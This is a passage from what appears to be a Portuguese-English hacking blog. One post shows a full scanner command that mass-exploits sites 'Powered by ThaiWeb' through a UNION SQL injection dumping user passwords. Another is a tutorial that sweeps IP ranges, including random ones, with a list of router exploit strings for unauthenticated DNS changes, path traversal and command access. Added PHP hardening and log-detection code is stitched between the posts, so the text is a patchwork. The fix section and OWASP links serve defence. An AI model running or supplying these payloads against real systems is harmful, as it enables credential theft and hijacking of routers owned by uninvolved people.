<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidjzrARJrq52ZQz0VqyPUKu79lMQpQJHr3f3GdC9xr7PVxAZ19KqemSEJHmB_e6hwNkm6rW8eyg_XRSlXNY6J_TnIIMtCEIAVsMEtpDJZpdlxWghzUmDkkLCGcs2k8eR1j3glmbfrE9Vdo/s1600/Captura+de+tela+de+2015-07-25+03%253A11%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidjzrARJrq52ZQz0VqyPUKu79lMQpQJHr3f3GdC9xr7PVxAZ19KqemSEJHmB_e6hwNkm6rW8eyg_XRSlXNY6J_TnIIMtCEIAVsMEtpDJZpdlxWghzUmDkkLCGcs2k8eR1j3glmbfrE9Vdo/s640/Captura+de+tela+de+2015-07-25+03%253A11%253A08.png" title="Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>ADMIN PANEL:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPxyzv1681dpx8GGxKw2hlBvuYH0UnAt6D_cxdTrdYFIAmwpBaiXXYWDYxh2tllA6Ndj_CvQGLmOvzzINqFktXvgHEGvIK-Ae8oP7PvcE8EpyTn3hMr5japMdgK0o_RZvyVP6ykPcqBla/s1600/Captura+de+tela+de+2015-07-25+03%253A40%253A14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation. THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach. We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally." border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPxyzv1681dpx8GGxKw2hlBvuYH0UnAt6D_cxdTrdYFIAmwpBaiXXYWDYxh2tllA6Ndj_CvQGLmOvzzINqFktXvgHEGvIK-Ae8oP7PvcE8EpyTn3hMr5japMdgK0o_RZvyVP6ykPcqBla/s640/Captura+de+tela+de+2015-07-25+03%253A40%253A14.png" title="ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation. THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach. We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND FULL:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> '"Powered by ThaiWeb"' <b>-s</b> ThaiWeb.txt <b>-q</b> all <b>-t</b> 2 <b>--unique</b> <b>-a</b> 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x<b>hex(</b>:<b>)</b>,pws,0x<b>hex(</b>:<b>)</b>,0x<b>hex(</b>inurlbr_vuln<b>)</b>%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OUTPUT PRINT:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3DvfESppSIyCof8a_gMwloGNp8bJxUV33Y1YVps8FWaBXG-C52d_1e6y_AAaK6hT_pOyyX9_MaM5t9OXpbX7_uCWMMppIymZjoEfmjYW9PulE7YlYCEVXAFEU-HVmvh-1wF5P7S3bMPAp/s1600/Captura+de+tela+de+2015-07-25+03%253A48%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user' OUTPUT PRINT:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3DvfESppSIyCof8a_gMwloGNp8bJxUV33Y1YVps8FWaBXG-C52d_1e6y_AAaK6hT_pOyyX9_MaM5t9OXpbX7_uCWMMppIymZjoEfmjYW9PulE7YlYCEVXAFEU-HVmvh-1wF5P7S3bMPAp/s640/Captura+de+tela+de+2015-07-25+03%253A48%253A26.png" title="COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user' OUTPUT PRINT:" width="640" /></a></div>
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Source discovery: </b></span><br />
<a href="http://seclists.org/fulldisclosure/2015/Jul/109"><span style="font-family: Courier New, Courier, monospace;">http://seclists.org/fulldisclosure/2015/Jul/109</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Solution - Fix & Patch:</b></span><br />
The <b>vulnerability</b> can be patched by securely parsing and encoding the vulnerable <b>id_run</b> parameter value in the index.php file.<br />
Restrict the input to the expected type and use a prepared statement for the <b>sql</b> query built from the GET request.<br />
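As an added example (not ThaiWeb's source and not part of the original post), a PHP sketch of the vulnerable id_run lookup next to the hardened version the fix above describes: validate the value as an integer, then bind it through a PDO prepared statement. The table and column names and the in-memory SQLite rows are assumptions for the demo.

```php
<?php
// Added example, not ThaiWeb's own index.php: a minimal reconstruction of the
// vulnerable "Content=product&id_run=" lookup next to a hardened version.
// Table and column names (product, id_run, name) are assumptions for the demo.
// Requires PHP 8 with the pdo_sqlite extension for the stand-alone run.

// --- Vulnerable pattern: the raw GET value is spliced into the SQL text ---
function buildProductQueryUnsafe(string $idRun): string
{
    // "-12 union select ... from user" is appended unchanged, so the value
    // rewrites the statement instead of being compared against id_run.
    return "SELECT id_run, name FROM product WHERE id_run = " . $idRun;
}

// --- Hardened step 1: restrict the input to what id_run can legitimately be ---
function validateIdRun(string $raw): ?int
{
    // id_run is a numeric identifier, so only a plain positive integer is
    // accepted; "-12 union select ...", "12abc" and "" are all rejected here.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// --- Hardened step 2: bind the value through a prepared statement ---
function fetchProduct(PDO $pdo, string $rawIdRun): ?array
{
    $id = validateIdRun($rawIdRun);
    if ($id === null) {
        return null; // rejected before the database is touched
    }
    // The SQL text is fixed; the value travels separately as a typed parameter
    // and can never change the structure of the statement.
    $stmt = $pdo->prepare('SELECT id_run, name FROM product WHERE id_run = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Stand-alone demo against an in-memory SQLite database with constructed rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE product (id_run INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO product VALUES (12, 'widget')");

$payload = '-12 union select 1,2 from user'; // shape of the exploit-get string above
echo 'unsafe SQL built from the payload: ', buildProductQueryUnsafe($payload), "\n";
var_dump(fetchProduct($pdo, $payload)); // NULL: validateIdRun rejects it
var_dump(fetchProduct($pdo, '12'));     // ['id_run' => 12, 'name' => 'widget']
```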
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Avoid SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>SQL Injection Prevention</b> Cheat Sheet.<br />
<a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</span></a><br />
See the OWASP <b>Query Parameterization</b> Cheat Sheet.<br />
<a href="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet</span></a><br />
See the OWASP <b>Guide article</b> on how to <b>Avoid SQL Injection Vulnerabilities</b>.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Guide_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Guide_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Guide_to_SQL_Injection" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Guide_to_SQL_Injection</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Review Code for SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>Code Review</b> Guide article on how to Review <b>Code for SQL Injection</b> Vulnerabilities.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection</span></a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>How to Test for SQL Injection Vulnerabilities</b></span><br />
See the OWASP <b>Testing Guide</b> article on how to <b>Test for SQL Injection</b> Vulnerabilities.<br />
<a href="https://www.owasp.org/index.php/Category:OWASP_Testing_Project" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Category:OWASP_Testing_Project</span></a><br />
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank"><span style="font-family: Courier New, Courier, monospace;">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</span></a><br />
<br />
Posted by InurlBR, 2015-07-20T04:33:00-03:00: INURLBR searching for routers<h3 style="text-align: center;">
In this short article we will use the <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a> tool to search for <a href="http://blog.inurl.com.br/search/label/router" target="_blank">routers</a> in given IP ranges. </h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4eXUitTy3cHoKrqjKhbbX9G2OEan9J_Fi7b9Ey12-Q7MhxDMxChkpex_rONd0opIclzlh2ag2j3b-m0GkxQvF4e2f2uWgK2hESIYrccH_w0D6ene1KrZ1NbGXcueDw-bLz3EV-maK1MDq/s1600/Captura+de+tela+de+2015-07-20+04%253A33%253A39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido. Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation. We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers. Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS." border="0" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4eXUitTy3cHoKrqjKhbbX9G2OEan9J_Fi7b9Ey12-Q7MhxDMxChkpex_rONd0opIclzlh2ag2j3b-m0GkxQvF4e2f2uWgK2hESIYrccH_w0D6ene1KrZ1NbGXcueDw-bLz3EV-maK1MDq/s640/Captura+de+tela+de+2015-07-20+04%253A33%253A39.png" title="The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido. Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. 
With concatenation process made the tool sends the request against its target to make possible the validation. We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers. Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS." width="640" /></a></div>
<br />
The tool has methods that generate an IP range or a given number of random IPs.<br />
I set aside several router exploits so that we can use the <b>INURLBR</b> method called <a href="http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html" target="_blank">SUB_PROCESS</a>.<br />
<i>SUB_PROCESS consists of concatenating a series of strings taken from a predefined file.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download tool INURLBR:</span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br /><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SUB_PROCESS</span></b> - takes each string from a predefined file and concatenates it onto the target; once the concatenation is done, the <b>tool</b> sends the <b>request</b> to its target so that <b>validation</b> is possible.<br />
<br />
We will use GET requests and treat a request as <b>successfully</b> executed when it returns HTTP <b>code</b> 200.<br />
There will be no exploitation; we are only filtering for routers.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Creating SUB_PROCESS file</b></span><br />
First we must create the <b>file</b> containing the <b>exploit</b> strings that SUB_PROCESS will use.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>File content:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
<span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dvr/wwwroot/user.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/web_cgi.cgi?&request=UploadFile&path=/etc/</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<span style="font-family: Courier New, Courier, monospace;">/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3</span><br />
<span style="font-family: Courier New, Courier, monospace;">/html/tUserAccountControl.htm</span><br />
<span style="font-family: Courier New, Courier, monospace;">/common/info.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/hedwig.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/tools_admin.asp</span><br />
<span style="font-family: Courier New, Courier, monospace;">/hnap.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/scdmz.cmd?&fwFlag=50853375&dosenbl=1</span><br />
<span style="font-family: Courier New, Courier, monospace;">/cliget.cgi?cmd=help</span><br />
<span style="font-family: Courier New, Courier, monospace;">/scgi-bin/platform.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/soap.cgi</span><br />
<span style="font-family: Courier New, Courier, monospace;">/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc</span><br />
<span style="font-family: Courier New, Courier, monospace;">/command.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">/authentication.cgi</span><br />
<div>
<br /></div>
<div>
Each line of the file is concatenated with the target <b>IP</b>, and the resulting request is sent so that the returned <b>http</b> code can be checked.</div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example:</span></b><br /><span style="font-family: Courier New, Courier, monospace;">http://TARGET<b>/{STRING_SUB_PROCESS}</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">http://200.16.3.***<b>/</b></span><span style="font-family: Courier New, Courier, monospace;"><b>dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</b></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">http://200.16.3.***</span><span style="font-family: Courier New, Courier, monospace;"><b>/tools_admin.asp</b></span></div>
<div>
<br /></div>
<div>
If the <b>HTTP</b> server returns code <b>200</b>, the request was <b>performed successfully</b>.</div>
<div>
<br /><span style="font-family: Courier New, Courier, monospace;">if(HTTP_CODE == 200){</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>VULN</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span><br /></div>
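The same concatenation rule, seen from the server side: an added PHP example (not part of INURLBR or of either post) that reads access-log lines and flags both the SUB_PROCESS probe paths listed above and the UNION/group_concat shape of the id_run exploit-get string from the previous post. The log lines, source addresses and the sweep threshold are constructed for the demo.

```php
<?php
// Added example, not part of INURLBR or the original posts: a detector that
// reads web-server access-log lines (Apache/Nginx "combined" format) and flags
// the two request patterns described on this page. Requires PHP 8.
// The log lines at the bottom are constructed for the demo.

// Request paths taken from the SUB_PROCESS file above (query strings ignored).
const PROBE_PATHS = [
    '/dnscfg.cgi', '/dns_1', '/Forms/dns_1', '/ddnsmngr.cmd', '/dvr/wwwroot/user.cgi',
    '/web_cgi.cgi', '/html/tUserAccountControl.htm', '/common/info.cgi', '/hedwig.cgi',
    '/tools_admin.asp', '/hnap.cgi', '/scdmz.cmd', '/cliget.cgi', '/scgi-bin/platform.cgi',
    '/soap.cgi', '/dws/api/ListFile', '/command.php', '/authentication.cgi',
];

// Parse one combined-format line; returns null when the line does not match.
function parseLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

// Split the request target into a decoded path and a decoded, lower-cased query.
function splitTarget(string $target): array
{
    $parts = explode('?', $target, 2);
    return [urldecode($parts[0]), strtolower(urldecode($parts[1] ?? ''))];
}

// Classify one request; returns a rule name or null when nothing matched.
function classifyRequest(array $req): ?string
{
    [$path, $query] = splitTarget($req['target']);
    // Rule 1: UNION-based SQLi of the shape used against id_run above
    // (urldecode turns "+" into spaces and "%28" into "(").
    if (preg_match('/\bunion\s+(all\s+)?select\b/', $query)
            && str_contains($query, 'group_concat(')) {
        return 'sqli-union-group_concat';
    }
    // Rule 2: a router/CGI probe path from the SUB_PROCESS list
    if (in_array($path, PROBE_PATHS, true)) {
        return 'router-cgi-probe';
    }
    return null;
}

// Run over a batch of lines. Every hit is reported regardless of the response
// code: the scanner only keeps 200s, but a defender wants the 404s too. A client
// touching several distinct probe paths is reported as a SUB_PROCESS-style sweep.
function detect(array $lines, int $sweepThreshold = 3): array
{
    $hits = [];
    $probePathsByIp = [];
    foreach ($lines as $line) {
        $req = parseLogLine($line);
        if ($req === null) {
            continue;
        }
        $rule = classifyRequest($req);
        if ($rule === null) {
            continue;
        }
        $hits[] = ['ip' => $req['ip'], 'rule' => $rule,
                   'status' => $req['status'], 'target' => $req['target']];
        if ($rule === 'router-cgi-probe') {
            [$path] = splitTarget($req['target']);
            $probePathsByIp[$req['ip']][$path] = true;
        }
    }
    $sweeps = [];
    foreach ($probePathsByIp as $ip => $paths) {
        if (count($paths) >= $sweepThreshold) {
            $sweeps[$ip] = count($paths);
        }
    }
    return ['hits' => $hits, 'sweeps' => $sweeps];
}

// Constructed sample lines; source addresses are documentation ranges.
$sample = [
    '203.0.113.7 - - [25/Jul/2015:03:11:08 -0300] "GET /index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5+from+user HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Jul/2015:04:19:25 -0300] "GET /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 311 "-" "-"',
    '198.51.100.9 - - [20/Jul/2015:04:19:25 -0300] "GET /tools_admin.asp HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [20/Jul/2015:04:19:26 -0300] "GET /hnap.cgi HTTP/1.1" 404 162 "-" "-"',
    '192.0.2.44 - - [20/Jul/2015:04:20:00 -0300] "GET /index.php?Content=product&id_run=12 HTTP/1.1" 200 8200 "-" "Mozilla/5.0"',
];
$result = detect($sample);
foreach ($result['hits'] as $h) {
    echo "{$h['ip']} {$h['rule']} HTTP {$h['status']} {$h['target']}\n";
}
foreach ($result['sweeps'] as $ip => $n) {
    echo "sweep from $ip: $n distinct probe paths\n";
}
```

On the sample, the last legitimate request produces no hit, the first line is flagged as SQLi, and 198.51.100.9 is reported as a sweep of three probe paths even though one of them returned 404.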
<div>
Now let's create our command to run the tool INURLBR.</div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Setting up the command:</b></span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET RANGE IP:</span></b><br /><u>RANGE IP:</u></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --range Set range IP.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--range</b> {range_start,rage_end}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--range</b> '172.16.0.5,172.16.0.255'</span></span></div>
<div>
<br /></div>
<div>
<b>OR</b></div>
<div>
<br /><u>RANGE IP RANDOM:</u></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --range-rand Set amount of random ips.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--range-rand</b> {rand}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--range-rand</b> '50'</span></span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILE OUTPUT:</b></span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> vuln.txt</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILE SUB_PROCESS:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--sub-file Subprocess performs an injection </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> strings in URLs found by the engine, via GET or POST.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--sub-file</b> {youfile}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--sub-file</b> exploits_get.txt</span></span></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET TYPE OF REQUEST - SUB_PROCESS:</b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --sub-get defines whether the strings coming from </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --sub-file will be injected via GET.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <b><span style="color: red;">--sub-get</span></b></span></div>
</div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET </b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>VALIDATION HTTP CODE:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --ifcode Valid results based on your return http code.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--ifcode</b> {ifcode}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--ifcode</b> 200</span></span></div>
</div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET TIME-OUT</b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --time-out Timeout to exit the process.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--time-out</b> {second}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--time-out</b> 3</span></span></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">COMPLETE COMMAND:</span></b></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--range</b> '172.1.0.1,172.1.0.163' <b>-s</b> vuln.txt <b>--sub-file</b> 'string_exploits.txt' <b>--sub-get</b> <b>--ifcode</b> 200</span></div>
<div>
<br /></div>
<div>
print output:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkiDmGQuGQtH7lQ6ke-bDkIzYvvYD9xC99S66jMA_5faqQQtF7f4r6aUH2d1VthexW-d70hp5Z3blAkssqL1AJuAKGRUEdmFSK6Kb1UO6D7IbNhi-wuc9m1yGiit7rlh95MoYhObuSaR-/s1600/Captura+de+tela+de+2015-07-20+04%253A19%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200 print output:" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkiDmGQuGQtH7lQ6ke-bDkIzYvvYD9xC99S66jMA_5faqQQtF7f4r6aUH2d1VthexW-d70hp5Z3blAkssqL1AJuAKGRUEdmFSK6Kb1UO6D7IbNhi-wuc9m1yGiit7rlh95MoYhObuSaR-/s640/Captura+de+tela+de+2015-07-20+04%253A19%253A25.png" title="COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200 print output:" width="640" /></a></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Strings exploits used:</b></span></div>
<div>
<a href="https://www.exploit-db.com/search/?order_by=date&order=desc&pg=1&action=search&description=d-link" target="_blank">https://www.exploit-db.com/search/?order_by=date&order=desc&pg=1&action=search&description=d-link</a></div>
<div>
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="font-size: large;">All exploits cited already have fix packages available.</span></blockquote>
<div>
<br /></div>
<b>Exploit_model:</b> <b>Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<a href="http://www.exploit-db.com/exploits/35995/" target="_blank">http://www.exploit-db.com/exploits/35995/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
